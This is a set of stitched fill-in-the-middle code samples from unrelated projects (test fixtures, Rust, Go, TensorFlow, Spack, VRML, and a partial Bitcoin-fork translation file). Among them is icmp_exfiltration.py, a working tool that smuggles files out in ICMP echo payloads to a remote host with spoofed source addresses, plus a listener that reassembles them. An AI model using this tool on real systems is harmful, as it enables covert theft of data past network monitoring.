"lastName": "Duke", "creatorType": "author" } ], "date": "2017-4-01", "DOI": "10.2471/BLT.16.186676", "ISSN": "0042-9686", "abstractNote": "288", "extra": "PMID: 28479624", "issue": "4", "language": "en", "libraryCatalog": "apps.who.int", "pages": "288-302", "publicationTitle": "Bulletin of the World Health Organization", "rights": "http://creativecommons.org/licenses/by/3.0/igo/legalcode", "shortTitle": "Providing oxygen to children in hospitals", "url": "http://apps.who.int/iris/handle/10665/272081", "volume": "95", "attachments": [ { "title": "Full Text PDF", "mimeType": "application/pdf" }, { "title": "Snapshot" }, { "title": "PubMed entry", "mimeType": "text/html", "snapshot": false } ], "tags": [ { "tag": "Systematic Reviews" } ], "notes": [], "seeAlso": [] } ] }, { "type": "web", "url": "http://apps.who.int/iris/handle/10665/273678", "items": [ { "itemType": "book", "title": "Сборник руководящих принципов и стандартов ВОЗ: обеспечение оптимального оказания медицинских услуг пациентам с туберкулезом", "creators": [ { "lastName": "Всемирная организация здравоохранения", "creatorType": "author", "fieldMode": true } ], "date": "2018", "ISBN": "9789244514108", "language": "ru", "libraryCatalog": "apps.who.int", "numPages": "47", "publisher": "Всемирная организация здравоохранения", "rights": "CC BY-NC-SA 3.0 IGO", "shortTitle": "Сборник руководящих принципов и стандартов ВОЗ", "url": "http://apps.who.int/iris/handle/10665/273678", "attachments": [ { "title": "Full Text PDF", "mimeType": "application/pdf" }, { "title": "Snapshot" } ], "tags": [ { "tag": "Delivery of Health Care" }, { "tag": "Disease Management" }, { "tag": "Guideline" }, { "tag": "Infection Control" }, { "tag": "Multidrug-Resistant" }, { "tag": "Patient Care" }, { "tag": "Reference Standards" }, { "tag": "Tuberculosis" } ], "notes": [], "seeAlso": [] } ] }, { "type": "web", "url": "http://apps.who.int/iris/handle/10665/165097", "items": "multiple" }, { "type": "web", "url": "http://apps.who.int/iris/discover?query=acupuncture", "items": "multiple" } ]; /** END TEST CASES **/<|fim▁end|>
<|file_name|>borrowck-return-variable-on-stack-via-clone.rs<|end_file_name|><|fim▁begin|>// Check that when we clone a `&T` pointer we properly relate the // lifetime of the pointer which results to the pointer being cloned. // Bugs in method resolution have sometimes broken this connection. // Issue #19261. <|fim▁hole|> fn main() { }<|fim▁end|>
fn leak<'a, T>(x: T) -> &'a T { (&x).clone() //~ ERROR cannot return value referencing function parameter `x` }
<|file_name|>index.js<|end_file_name|><|fim▁begin|>var express = require('express') var app = module.exports = express() <|fim▁hole|><|fim▁end|>
app.get('/404', require('lib/site/layout')) app.get('*', function (req, res) { res.redirect('/404') })
<|file_name|>PhRequest.ts<|end_file_name|><|fim▁begin|>import { PaymentHighwayUtility } from '../../PaymentHighwayUtility';<|fim▁hole|> public requestId: string; constructor() { this.requestId = PaymentHighwayUtility.createRequestId(); } }<|fim▁end|>
export class Request {
<|file_name|>joins.py<|end_file_name|><|fim▁begin|>from enum import Enum from typing import Union, List, Optional from .space2d import * from .space3d import * class JoinTypes(Enum): """ Enumeration for Line and Segment type. """ START_START = 1 # start point coincident with start point START_END = 2 # start point coincident with end point END_START = 3 # end point coincident with start point END_END = 4 # end point coincident with end point def analizeJoins2D( first: Union[Line2D, Segment2D], second: Union[Line2D, Segment2D] ) -> List[Optional[JoinTypes]]: """ Analyze join types between two lines/segments. :param first: a line or segment. :param second: a line or segment. :return: a list of join types. Examples: >>> first = Segment2D(Point2D(x=0,y=0), Point2D(x=1,y=0)) >>> second = Segment2D(Point2D(x=1,y=0), Point2D(x=0,y=0)) >>> analizeJoins2D(first, second) [<JoinTypes.START_END: 2>, <JoinTypes.END_START: 3>] >>> first = Segment2D(Point2D(x=0,y=0), Point2D(x=1,y=0)) >>> second = Segment2D(Point2D(x=2,y=0), Point2D(x=3,y=0)) >>> analizeJoins2D(first, second) []<|fim▁hole|> join_types = [] if first.start_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.START_START) if first.start_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.START_END) if first.end_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.END_START) if first.end_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.END_END) return join_types def analizeJoins3D( first: Union[Line3D, Segment3D], second: Union[Line3D, Segment3D] ) -> List[Optional[JoinTypes]]: """ Analyze join types between two lines/segments. :param first: a line or segment. :type first: Line or Segment. :param second: a line or segment. :param second: Line or Segment. :return: a list of join types. :rtype: List[Optional[JoinTypes]]. Examples: """ join_types = [] if first.start_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.START_START) if first.start_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.START_END) if first.end_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.END_START) if first.end_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.END_END) return join_types<|fim▁end|>
"""
<|file_name|>kailua-check-test.rs<|end_file_name|><|fim▁begin|>#[macro_use] extern crate log; extern crate env_logger; extern crate clap; extern crate kailua_test; extern crate kailua_env; extern crate kailua_diag; extern crate kailua_syntax; extern crate kailua_types; extern crate kailua_check; use std::str; use std::usize; use std::cell::RefCell; use std::rc::Rc; use std::collections::HashMap; use clap::{App, Arg, ArgMatches}; use kailua_env::{Source, Span, Spanned}; use kailua_diag::{Stop, Locale, Report, Reporter, TrackMaxKind}; use kailua_syntax::{Chunk, parse_chunk}; use kailua_types::ty::{TypeContext, Display}; use kailua_check::check_from_chunk; use kailua_check::options::Options; use kailua_check::env::Context; struct Testing { note_spanned_infos: bool, } impl Testing { fn new() -> Testing { Testing { note_spanned_infos: false } } } impl kailua_test::Testing for Testing { fn augment_args<'a, 'b: 'a>(&self, app: App<'a, 'b>) -> App<'a, 'b> { app.arg( Arg::with_name("note_spanned_infos") .short("s") .long("note-spanned-infos") .help("Displays a list of spanned informations.\n\ Only useful when used with `--exact-diags`.")) } fn collect_args<'a>(&mut self, matches: &ArgMatches<'a>) { self.note_spanned_infos = matches.is_present("note_spanned_infos"); } fn run(&self, source: Rc<RefCell<Source>>, span: Span, filespans: &HashMap<String, Span>, report: Rc<Report>) -> String { let chunk = match parse_chunk(&source.borrow(), span, &*report) { Ok(chunk) => chunk, Err(_) => return format!("parse error"), }; struct Opts { source: Rc<RefCell<Source>>, filespans: HashMap<String, Span>, } impl Options for Opts { fn require_chunk(&mut self, path: Spanned<&[u8]>, report: &Report) -> Result<Chunk, Option<Stop>> { let path = str::from_utf8(&path).map_err(|_| None)?; let span = *self.filespans.get(path).ok_or(None)?; parse_chunk(&self.source.borrow(), span, report).map_err(|_| None) } } let report = Rc::new(TrackMaxKind::new(report)); let opts = Rc::new(RefCell::new(Opts { source: source, filespans: filespans.clone() })); let mut context = Context::new(report.clone()); let ret = check_from_chunk(&mut context, chunk, opts); // spanned information is available even on error if self.note_spanned_infos { let mut slots: Vec<_> = context.spanned_slots().iter().collect(); slots.sort_by_key(|slot| { (slot.span.unit(), slot.span.end().to_usize(), usize::MAX - slot.span.begin().to_usize()) }); for slot in slots { let msg = format!("slot: {}", slot.display(context.types() as &TypeContext) .localized(Locale::dummy())); report.info(slot.span, &msg).done().unwrap(); } } match ret { Ok(()) => { if report.can_continue() { format!("ok") } else { info!("check failed due to prior errors"); format!("error") } },<|fim▁hole|> info!("check failed: {:?}", e); format!("error") }, } } } fn main() { env_logger::init().unwrap(); kailua_test::Tester::new("kailua-check-test", Testing::new()) .feature("no_implicit_func_sig", cfg!(feature = "no_implicit_func_sig")) .feature("warn_on_useless_conds", cfg!(feature = "warn_on_useless_conds")) .feature("warn_on_dead_code", cfg!(feature = "warn_on_dead_code")) .scan("src/tests") .done(); }<|fim▁end|>
Err(e) => {
<|file_name|>cambridgeaudio.py<|end_file_name|><|fim▁begin|>""" Discover Cambridge Audio StreamMagic devices. """ from . import SSDPDiscoverable class Discoverable(SSDPDiscoverable): """Add support for discovering Cambridge Audio StreamMagic devices.""" def get_entries(self): """Get all Cambridge Audio MediaRenderer uPnP entries.""" return self.find_by_device_description({<|fim▁hole|> })<|fim▁end|>
"manufacturer": "Cambridge Audio", "deviceType": "urn:schemas-upnp-org:device:MediaRenderer:1"
<|file_name|>tableDetail.js<|end_file_name|><|fim▁begin|>/* * Copyright 2017-present Open Networking Foundation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* ONOS GUI -- Widget -- Table Detail Panel Service */ (function () { 'use strict'; // injected refs var $log, $interval, $timeout, fs, wss; // constants // var refreshInterval = 2000; function noop() {} // TODO: describe the input object for the main function // example params to (functionX): // { // ... // } function buildBasePanel(opts) { var popTopF = fs.isF(opts.popTop) || noop, popMidF = fs.isF(opts.popMid) || noop, popBotF = fs.isF(opts.popBot) || noop;<|fim▁hole|> // TODO: create divs, and pass into invocations of popTopF(div), etc. } // more functions // TODO: add ref to PanelService angular.module('onosWidget') .factory('TableDetailService', ['$log', '$interval', '$timeout', 'FnService', 'WebSocketService', function (_$log_, _$interval_, _$timeout_, _fs_, _wss_) { $log = _$log_; $interval = _$interval_; $timeout = _$timeout_; fs = _fs_; wss = _wss_; return { buildBasePanel: buildBasePanel }; }]); }());<|fim▁end|>
$log.debug('options are', opts); // TODO use panel service to create base panel
<|file_name|>client.go<|end_file_name|><|fim▁begin|>// Copyright Project Harbor Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package core import ( "fmt" modelsv2 "github.com/goharbor/harbor/src/controller/artifact" "net/http" "github.com/goharbor/harbor/src/chartserver" chttp "github.com/goharbor/harbor/src/common/http" "github.com/goharbor/harbor/src/common/http/modifier" ) // Client defines the methods that a core client should implement // Currently, it contains only part of the whole method collection // and we should expand it when needed type Client interface { ArtifactClient ChartClient } // ArtifactClient defines the methods that an image client should implement type ArtifactClient interface {<|fim▁hole|> DeleteArtifact(project, repository, digest string) error DeleteArtifactRepository(project, repository string) error } // ChartClient defines the methods that a chart client should implement type ChartClient interface { ListAllCharts(project, repository string) ([]*chartserver.ChartVersion, error) DeleteChart(project, repository, version string) error DeleteChartRepository(project, repository string) error } // New returns an instance of the client which is a default implement for Client func New(url string, httpclient *http.Client, authorizer modifier.Modifier) Client { return &client{ url: url, httpclient: chttp.NewClient(httpclient, authorizer), } } type client struct { url string httpclient *chttp.Client } func (c *client) buildURL(path string) string { return fmt.Sprintf("%s%s", c.url, path) }<|fim▁end|>
ListAllArtifacts(project, repository string) ([]*modelsv2.Artifact, error)
<|file_name|>closing-channels.go<|end_file_name|><|fim▁begin|>package main import ( "fmt" ) func main() { jobs := make(chan int, 5)<|fim▁hole|> for { j, more := <-jobs if more { fmt.Println("received job", j) } else { fmt.Println("received all jobs") done <- true return } } }() for j := 1; j <= 3; j++ { jobs <- j fmt.Println("sent job", j) } close(jobs) fmt.Println("sent all jobs") <-done }<|fim▁end|>
done := make(chan bool) go func() {
<|file_name|>sparsemax.py<|end_file_name|><|fim▁begin|># Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Sparsemax op.""" <|fim▁hole|>from __future__ import print_function from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import nn __all__ = ["sparsemax"] def sparsemax(logits, name=None): """Computes sparsemax activations [1]. For each batch `i` and class `j` we have $$sparsemax[i, j] = max(logits[i, j] - tau(logits[i, :]), 0)$$ [1]: https://arxiv.org/abs/1602.02068 Args: logits: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`. name: A name for the operation (optional). Returns: A `Tensor`. Has the same type as `logits`. """ with ops.name_scope(name, "sparsemax", [logits]) as name: logits = ops.convert_to_tensor(logits, name="logits") obs = array_ops.shape(logits)[0] dims = array_ops.shape(logits)[1] # In the paper, they call the logits z. # The mean(logits) can be substracted from logits to make the algorithm # more numerically stable. the instability in this algorithm comes mostly # from the z_cumsum. Substacting the mean will cause z_cumsum to be close # to zero. However, in practise the numerical instability issues are very # minor and substacting the mean causes extra issues with inf and nan # input. z = logits # sort z z_sorted, _ = nn.top_k(z, k=dims) # calculate k(z) z_cumsum = math_ops.cumsum(z_sorted, axis=1) k = math_ops.range( 1, math_ops.cast(dims, logits.dtype) + 1, dtype=logits.dtype) z_check = 1 + k * z_sorted > z_cumsum # because the z_check vector is always [1,1,...1,0,0,...0] finding the # (index + 1) of the last `1` is the same as just summing the number of 1. k_z = math_ops.reduce_sum(math_ops.cast(z_check, dtypes.int32), axis=1) # calculate tau(z) # If there are inf values or all values are -inf, the k_z will be zero, # this is mathematically invalid and will also cause the gather_nd to fail. # Prevent this issue for now by setting k_z = 1 if k_z = 0, this is then # fixed later (see p_safe) by returning p = nan. This results in the same # behavior as softmax. k_z_safe = math_ops.maximum(k_z, 1) indices = array_ops.stack([math_ops.range(0, obs), k_z_safe - 1], axis=1) tau_sum = array_ops.gather_nd(z_cumsum, indices) tau_z = (tau_sum - 1) / math_ops.cast(k_z, logits.dtype) # calculate p p = math_ops.maximum( math_ops.cast(0, logits.dtype), z - tau_z[:, array_ops.newaxis]) # If k_z = 0 or if z = nan, then the input is invalid p_safe = array_ops.where( math_ops.logical_or( math_ops.equal(k_z, 0), math_ops.is_nan(z_cumsum[:, -1])), array_ops.fill([obs, dims], math_ops.cast(float("nan"), logits.dtype)), p) return p_safe<|fim▁end|>
from __future__ import absolute_import from __future__ import division
<|file_name|>package.py<|end_file_name|><|fim▁begin|>############################################################################## # Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC. # Produced at the Lawrence Livermore National Laboratory. # # This file is part of Spack. # Created by Todd Gamblin, [email protected], All rights reserved. # LLNL-CODE-647188 # # For details, see https://github.com/llnl/spack # Please also see the NOTICE and LICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Foundation) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## from spack import * <|fim▁hole|> homepage = "http://genome.sph.umich.edu/wiki/FastQValidator" url = "https://github.com/statgen/fastQValidator/archive/v0.1.1a.tar.gz" version('2017-01-10', commit='6d619a34749e9d33c34ef0d3e0e87324ca77f320', git='https://github.com/statgen/fastQValidator.git') resource( name='libStatGen', git='https://github.com/statgen/libStatGen.git', commit='9db9c23e176a6ce6f421a3c21ccadedca892ac0c' ) @property def build_targets(self): return ['LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen'))] @property def install_targets(self): return [ 'INSTALLDIR={0}'.format(self.prefix.bin), 'LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen')), 'install' ]<|fim▁end|>
class Fastqvalidator(MakefilePackage): """The fastQValidator validates the format of fastq files."""
<|file_name|>EventInSFImage.java<|end_file_name|><|fim▁begin|>package vrml.external.field; import vrml.external.field.FieldTypes; import vrml.external.Browser; import java.awt.*; import java.math.BigInteger; public class EventInSFImage extends EventIn { public EventInSFImage() { EventType = FieldTypes.SFIMAGE; } public void setValue(int width, int height, int components, byte[] pixels) throws IllegalArgumentException { int count; int pixcount; String val; BigInteger newval; byte xx[]; if (pixels.length != (width*height*components)) { throw new IllegalArgumentException(); } if ((components < 1) || (components > 4)) { throw new IllegalArgumentException(); } // use BigInt to ensure sign bit does not frick us up. xx = new byte[components+1]; xx[0] = (byte) 0; // no sign bit here! val = new String("" + width + " " + height + " " + components); if (pixels== null) { pixcount = 0;} else {pixcount=pixels.length;} if (components == 1) {<|fim▁hole|> newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } if (components == 2) { for (count = 0; count < pixcount; count+=2) { xx[1] = pixels[count]; xx[2] = pixels[count+1]; newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } if (components == 3) { for (count = 0; count < pixcount; count+=3) { xx[1] = pixels[count]; xx[2] = pixels[count+1]; xx[3]=pixels[count+2]; newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } if (components == 4) { for (count = 0; count < pixcount; count+=4) { xx[1] = pixels[count]; xx[2] = pixels[count+1]; xx[3]=pixels[count+2]; xx[4]=pixels[count+3]; newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } //System.out.println ("sending " + val); Browser.newSendEvent (this, val.length() + ":" + val + " "); return; } }<|fim▁end|>
for (count = 0; count < pixcount; count++) { xx[1] = pixels[count];
<|file_name|>spread.js<|end_file_name|><|fim▁begin|>// function add(a, b){ // return a+b; // } // // console.log(add(3,1)); // // var toAdd = [9, 5]; // console.log(add(...toAdd)); // var groupA = ['Jen', 'Cory']; // var groupB = ['Vikram'];<|fim▁hole|>// console.log(...final); var person = ['Andew', 25]; var personTwo = ['Jen', 29]; function greetingAge(a, b){ return 'Hi '+a+', you are '+ b; } console.log(greetingAge(...person)); console.log(greetingAge(...personTwo)); var names = ['Mike', 'Ben']; var final = ['Quentin', ...names]; for(i in final){ console.log('Hi '+ final[i]); }<|fim▁end|>
// var final = [...groupB, 3, ...groupA];
<|file_name|>vis.js<|end_file_name|><|fim▁begin|>version https://git-lfs.github.com/spec/v1 oid sha256:467bccdb74ef62e6611ba27f338a0ba0c49ba9a90ef1facb394c14de676318cf<|fim▁hole|><|fim▁end|>
size 1150464
<|file_name|>icmp_exfiltration.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python import os import sys import zlib import time import datetime<|fim▁hole|>from impacket import ImpactPacket """ Constants """ READ_BINARY = "rb" WRITE_BINARY = "wb" READ_FROM_SOCK = 7000 ICMP_HEADER_SIZE = 27 DATA_SEPARATOR = "::" DATA_TERMINATOR = "\x12\x13\x14\x15" INIT_PACKET = "\x12\x11\x13\x12\x12\x12" END_PACKET = "\x15\x14\x13\x12" LOGFILE_BASENAME = "icmp_log" LOGFILE_EXT = ".txt" def send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1): """ send_file will send a file to the ip_addr given. A file path is required to send the file. Max packet size can be determined automatically. :param ip_addr: IP Address to send the file to. :param src_ip_addr: IP Address to spoof from. Default it 127.0.0.1. :param file_path: Path of the file to send. :param max_packetsize: Max packet size. Default is 512. :return: """ if file_path == "": sys.stderr.write("No file path given.\n") return -1 # Load file fh = open(file_path, READ_BINARY) iAmFile = fh.read() fh.close() # Create Raw Socket s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) # Create IP Packet ip = ImpactPacket.IP() ip.set_ip_src(src_ip_addr) ip.set_ip_dst(ip_addr) # ICMP on top of IP icmp = ImpactPacket.ICMP() icmp.set_icmp_type(icmp.ICMP_ECHO) seq_id = 0 # Calculate File: IamDone = base64.b64encode(iAmFile) # Base64 Encode for ASCII checksum = zlib.crc32(IamDone) # Build CRC for the file # Fragmentation of DATA x = len(IamDone) / max_packetsize y = len(IamDone) % max_packetsize # Get file name from file path: head, tail = os.path.split(file_path) # Build stream initiation packet current_packet = "" current_packet += tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(x + 2) + DATA_TERMINATOR + INIT_PACKET icmp.contains(ImpactPacket.Data(current_packet)) ip.contains(icmp) icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) seq_id += 1 # Iterate over the file for i in range(1, x + 2): str_send = IamDone[max_packetsize * (i - 1): max_packetsize * i] + DATA_TERMINATOR icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) seq_id += 1 # Add last section str_send = IamDone[max_packetsize * i:max_packetsize * i + y] + DATA_TERMINATOR icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) seq_id += 1 icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) # Send termination package str_send = (tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(seq_id) + DATA_TERMINATOR + END_PACKET) icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) seq_id += 1 icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) return 0 def init_listener(ip_addr, saving_location="."): """ init_listener will start a listener for incoming ICMP packets on a specified ip_addr to receive the packets. It will then save a log file and the incoming information to the given path. If none given it will generate one itself. :param ip_addr: The local IP address to bind the listener to. :return: Nothing. """ # Trying to open raw ICMP socket. # If fails, you're probably just not root try: sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) sock.bind(('', 1)) sys.stdout.write("Now listening...\n") except: sys.stderr.write("Could not start listening.\nProbably not root.\n") raise # Resetting counters files_received = 0 i = 0 current_file = "" # init log file: current_time_as_string = str(datetime.datetime.now()).replace(":",".").replace(" ", "-")[:-7] log_fh = open(LOGFILE_BASENAME + current_time_as_string + LOGFILE_EXT, WRITE_BINARY) log_fh.write("Started logging at %s\n\n" % current_time_as_string) while True: # Extract data from IP header data = sock.recv(READ_FROM_SOCK) # Get data ip_header = data[:20] # Extract IP Header # Get IP ips = ip_header[-8:-4] source = "%i.%i.%i.%i" % (ord(ips[0]), ord(ips[1]), ord(ips[2]), ord(ips[3])) # Ignore everything but ECHO requests if data[20] != "\x08": pass elif data[28:].find(INIT_PACKET) != -1: # Extract data from Initiation packet: man_string = data[28:] # String to manipulate man_array = man_string.split(DATA_SEPARATOR) # Exploit data into array filename = man_array[0] checksum = man_array[1] amount_of_packets = man_array[2] # Document to log file log_fh.write("Received file:\n") log_fh.write("\tFile name:\t%s\n" % filename) log_fh.write("\tIncoming from:\t%s\n" % source) log_fh.write("\tFile checksum:\t%s\n" % checksum) log_fh.write("\tIn Packets:\t%s\n" % amount_of_packets) log_fh.write("\tIncoming at:\t%s\n" % str(datetime.datetime.now()).replace(":", ".").replace(" ", "-")[:-7]) elif data[28:].find(END_PACKET) != -1: # Extract data from Initiation packet: man_string = data[28:] # String to manipulate man_array = man_string.split(DATA_SEPARATOR) # Exploit data into array if filename != man_array[0]: sys.stderr.write("You tried transferring 2 files simultaneous. Killing my self now!\n") log_fh.write("Detected 2 file simultaneous. Killing my self.\n") return -1 else: log_fh.write("Got termination packet for %s\n" % man_array[0]) comp_crc = zlib.crc32(current_file) if str(comp_crc) == checksum: # CRC validated log_fh.write("CRC validation is green for " + str(comp_crc) + " with file name: " + filename + "\n") current_file = base64.b64decode(current_file) # Write to file fh = open(filename + "_" + checksum, WRITE_BINARY) fh.write(current_file) fh.close() files_received += 1 else: # CRC failed log_fh.write("CRC validation FAILED for '" + str(comp_crc) + "' with : " + checksum + "\n") # Resetting counters: i = 0 filename = "" data = "" man_string = "" man_array = [] elif data[28:].find(DATA_TERMINATOR) != -1: # Found a regular packet current_file += data[28:data.find(DATA_TERMINATOR)] log_fh.write("Received packet %s" % i + "\n") i += 1 if __name__ == "__main__": sys.stdout.write("This is meant to be a module for python and not a stand alone executable\n")<|fim▁end|>
import base64 from socket import *
<|file_name|>bitcoin_ca_ES.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" ?><!DOCTYPE TS><TS language="ca_ES" version="2.0"> <defaultcodec>UTF-8</defaultcodec> <context> <name>AboutDialog</name> <message> <location filename="../forms/aboutdialog.ui" line="+14"/> <source>About Bitcoin</source> <translation>Sobre Badcoin</translation> </message> <message> <location line="+39"/> <source>&lt;b&gt;Bitcoin&lt;/b&gt; version</source> <translation>&lt;b&gt;Badcoin&lt;/b&gt; versió</translation> </message> <message> <location line="+57"/> <source> This is experimental software. Distributed under the MIT/X11 software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. This product includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit (http://www.openssl.org/) and cryptographic software written by Eric Young ([email protected]) and UPnP software written by Thomas Bernard.</source> <translation>\n Aquest és software experimental.\n\n Distribuït sota llicència de software MIT/11, veure l&apos;arxiu COPYING o http://www.opensource.org/licenses/mit-license.php.\n\nAquest producte inclou software desarrollat pel projecte OpenSSL per a l&apos;ús de OppenSSL Toolkit (http://www.openssl.org/) i de softwqre criptogràfic escrit per l&apos;Eric Young ([email protected]) i software UPnP escrit per en Thomas Bernard.</translation> </message> <message> <location filename="../aboutdialog.cpp" line="+14"/> <source>Copyright</source> <translation>Copyright</translation> </message> <message> <location line="+0"/> <source>The Bitcoin developers</source> <translation type="unfinished"/> </message> </context> <context> <name>AddressBookPage</name> <message> <location filename="../forms/addressbookpage.ui" line="+14"/> <source>Address Book</source> <translation>Llibreta d&apos;adreces</translation> </message> <message> <location line="+19"/> <source>Double-click to edit address or label</source> <translation>Feu doble clic per editar l&apos;adreça o l&apos;etiqueta</translation> </message> <message> <location line="+27"/> <source>Create a new address</source> <translation>Crear una nova adreça</translation> </message> <message> <location line="+14"/> <source>Copy the currently selected address to the system clipboard</source> <translation>Copiar l&apos;adreça seleccionada al porta-retalls del sistema</translation> </message> <message> <location line="-11"/> <source>&amp;New Address</source> <translation>&amp;Nova adreça</translation> </message> <message> <location filename="../addressbookpage.cpp" line="+63"/> <source>These are your Bitcoin addresses for receiving payments. You may want to give a different one to each sender so you can keep track of who is paying you.</source> <translation>Aquestes són les teves adreces Badcoin per a rebre pagaments. Pot interesar-te proveïr diferents adreces a cadascun dels enviadors així pots identificar qui et va pagant.</translation> </message> <message> <location filename="../forms/addressbookpage.ui" line="+14"/> <source>&amp;Copy Address</source> <translation>&amp;Copiar adreça</translation> </message> <message> <location line="+11"/> <source>Show &amp;QR Code</source> <translation>Mostrar codi &amp;QR</translation> </message> <message> <location line="+11"/> <source>Sign a message to prove you own a Bitcoin address</source> <translation>Signa el missatge per provar que ets propietari de l&apos;adreça Badcoin</translation> </message> <message> <location line="+3"/> <source>Sign &amp;Message</source> <translation>Signar &amp;Missatge</translation> </message> <message> <location line="+25"/> <source>Delete the currently selected address from the list</source> <translation>Esborrar l&apos;adreça sel·leccionada</translation> </message> <message> <location line="+27"/> <source>Export the data in the current tab to a file</source> <translation type="unfinished"/> </message> <message> <location line="+3"/> <source>&amp;Export</source> <translation type="unfinished"/> </message> <message> <location line="-44"/> <source>Verify a message to ensure it was signed with a specified Bitcoin address</source> <translation>Verificar un missatge per asegurar-se que ha estat signat amb una adreça Badcoin específica</translation> </message> <message> <location line="+3"/> <source>&amp;Verify Message</source> <translation>&amp;Verificar el missatge</translation> </message> <message> <location line="+14"/> <source>&amp;Delete</source> <translation>&amp;Esborrar</translation> </message> <message> <location filename="../addressbookpage.cpp" line="-5"/> <source>These are your Bitcoin addresses for sending payments. Always check the amount and the receiving address before sending coins.</source> <translation>Aquestes són la seva adreça de Badcoin per enviar els pagaments. Sempre revisi la quantitat i l&apos;adreça del destinatari abans transferència de monedes.</translation> </message> <message> <location line="+13"/> <source>Copy &amp;Label</source> <translation>Copiar &amp;Etiqueta</translation> </message> <message> <location line="+1"/> <source>&amp;Edit</source> <translation>&amp;Editar</translation> </message> <message> <location line="+1"/> <source>Send &amp;Coins</source> <translation>Enviar &amp;Monedes</translation> </message> <message> <location line="+260"/> <source>Export Address Book Data</source> <translation>Exporta llibreta d&apos;adreces</translation> </message> <message> <location line="+1"/> <source>Comma separated file (*.csv)</source> <translation>Arxiu de separació per comes (*.csv)</translation> </message> <message> <location line="+13"/> <source>Error exporting</source> <translation>Error en l&apos;exportació</translation> </message> <message> <location line="+0"/> <source>Could not write to file %1.</source> <translation>No s&apos;ha pogut escriure a l&apos;arxiu %1.</translation> </message> </context> <context> <name>AddressTableModel</name> <message> <location filename="../addresstablemodel.cpp" line="+144"/> <source>Label</source> <translation>Etiqueta</translation> </message> <message> <location line="+0"/> <source>Address</source> <translation>Adreça</translation> </message> <message> <location line="+36"/> <source>(no label)</source> <translation>(sense etiqueta)</translation> </message> </context> <context> <name>AskPassphraseDialog</name> <message> <location filename="../forms/askpassphrasedialog.ui" line="+26"/> <source>Passphrase Dialog</source> <translation>Dialeg de contrasenya</translation> </message> <message> <location line="+21"/> <source>Enter passphrase</source> <translation>Introdueix contrasenya</translation> </message> <message> <location line="+14"/> <source>New passphrase</source> <translation>Nova contrasenya</translation> </message> <message> <location line="+14"/> <source>Repeat new passphrase</source> <translation>Repeteix la 